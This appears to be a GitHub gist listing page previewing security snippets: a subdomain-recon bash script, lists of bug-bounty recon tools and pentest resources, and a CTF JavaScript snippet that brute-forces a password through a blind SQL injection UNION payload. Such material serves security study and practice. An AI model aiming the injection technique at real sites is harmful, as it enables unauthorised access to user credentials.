Skip to content

Instantly share code, notes, and snippets.

View myuyu's full-sized avatar

El Mehdi myuyu

View GitHub Profile
@zenosxx
zenosxx / subdomain.sh
Last active April 26, 2021 08:28
Subdomain recon
#!/bin/bash
echo "Recon $1"
domain=$1
path="~/Desktop/Asset-note/"
folder=recon-$(date +"%Y-%m-%d")
sub_path=$path/$domain/$folder/subdomain
filemon_path=$path/$domain/Filemonitor
@cyberheartmi9
cyberheartmi9 / Bug Bounty methodology
Last active September 28, 2024 20:16
██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║
██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║
██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║
██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝
@intx0x80
@bl4de
bl4de / tools.md
Created July 25, 2017 10:16
Tools from @jhaddix TBHMv2 #LevelUp @bugcrowd (from https://github.com/DaniLabs/tools-tbhm)

Tools of The Bug Hunters Methodology V2

NOTE: The following list has been created based on the PPT "The Bug Hunters Methodology V2 by @jhaddix"

Discovery

  • Sublist3r (Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT).
  • Brutesubs (An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose).
  • Cloudflare_enum (Cloudflare DNS Enumeration Tool for Pentesters).
  • Censys.py (Quick and Dirty script to use the Censys API to query subdomains of a target domain).
  • massdns (A high-performance DNS stub resolver).
@jivoi
jivoi / offsec.md
Last active December 30, 2024 22:09
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@ZhangYiJiang
ZhangYiJiang / sql_injection.js
Created August 22, 2015 13:09
NUS Greyhats CTF Day 2 - Brute force password cracking on a blind SQL injection form
// Run this first: injects jQuery into the page
var s = document.createElement('script');
s.src = 'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js';
document.body.appendChild(s);
// SQL query: 1' AND FALSE UNION SELECT * FROM users WHERE password LIKE 'a%' #
// Recursive function to brute force out the password from the page
function getPassword(p) {
$.post('http://web.nusgreyhats.org/blindsqli/register.php', {
register: "1' AND FALSE UNION SELECT * FROM users WHERE password LIKE '" + p + "%' #"